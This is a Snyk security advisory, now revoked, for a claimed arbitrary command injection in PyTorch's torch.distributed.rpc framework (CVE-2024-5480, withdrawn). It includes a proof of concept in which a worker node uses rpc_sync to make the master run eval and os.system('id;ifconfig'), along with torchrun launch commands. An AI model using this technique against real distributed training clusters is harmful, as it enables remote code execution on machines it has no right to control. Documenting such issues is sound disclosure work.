Arbitrary Command Injection The advisory has been revoked - it doesn't affect any version of package torch  (opens in a new tab)


Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.04% (12th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Arbitrary Command Injection vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PYTHON-TORCH-7231127
  • published10 Jun 2024
  • disclosed6 Jun 2024
  • creditxbalien

Introduced: 6 Jun 2024

CVE-2024-5480  (opens in a new tab)
CWE-77  (opens in a new tab)

How to fix?

There is no fixed version for torch.

Amendment

This was deemed not a vulnerability.

Overview

torch is a Tensors and Dynamic neural networks in Python with strong GPU acceleration

Affected versions of this package are vulnerable to Arbitrary Command Injection through the torch.distributed.rpc framework due to missing function validation during RPC calls. An attacker can execute arbitrary commands by leveraging built-in Python functions such as eval during multi-CPU RPC communication.

Note: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.

PoC

Build master and worker nodes. Each node needs to set the following environment variables to ensure network communication between nodes.

export MASTER_ADDR=10.206.0.3
export MASTER_PORT=29500
export TP_SOCKET_IFNAME=eth0
export GLOO_SOCKET_IFNAME=eth0

On the master (10.206.0.3), enable the RPC service by calling the init_rpc function. At this time, the master will listen to 0.0.0.0:MSTER_PORT, which is used to communicate with each node in the network.

import torch
import torch.distributed.rpc as rpc

def add(a, b): return a + b

rpc.init_rpc("master", rank=0, world_size=2) rpc.shutdown()

On the worker, first, establish the rpc protocol with the master by calling init_rpc. Then, it is possible to communicate with the master through rpc.rpc_sync for RPC function invocations. Due to the lack of security filtering in torch.distributed.rpc, workers can execute built-in Python functions like eval on the master node through RPC, even though these functions are not intentionally provided by the developer. This leads to remote code execution on the master node, potentially causing it to be compromised.

import torch
import torch.distributed.rpc as rpc

rpc.init_rpc("worker", rank=1, world_size=2) ret = rpc.rpc_sync("master", eval, args=('import("os").system("id;ifconfig")',)) print(ret) rpc.shutdown()

The following commands can be used to start the master and worker separately. Of course, python3 master.py and python3 worker.py could also be executed separately.

for master:
torchrun --nproc_per_node=1 --nnodes=2 --node_rank=0 --master_addr=10.206.0.3 --master_port=29500 master.py

for worker: torchrun --nproc_per_node=1 --nnodes=2 --node_rank=1 --master_addr=10.206.0.3 --master_port=29500 worker.py

As a result, the worker exploited the vulnerability to call built-in Python functions like eval on the master and execute arbitrary commands such as os.system("id;ifconfig"). According to the test screenshot, the IP displayed after the command execution is 10.206.0.3, indicating that the command has been executed on the master.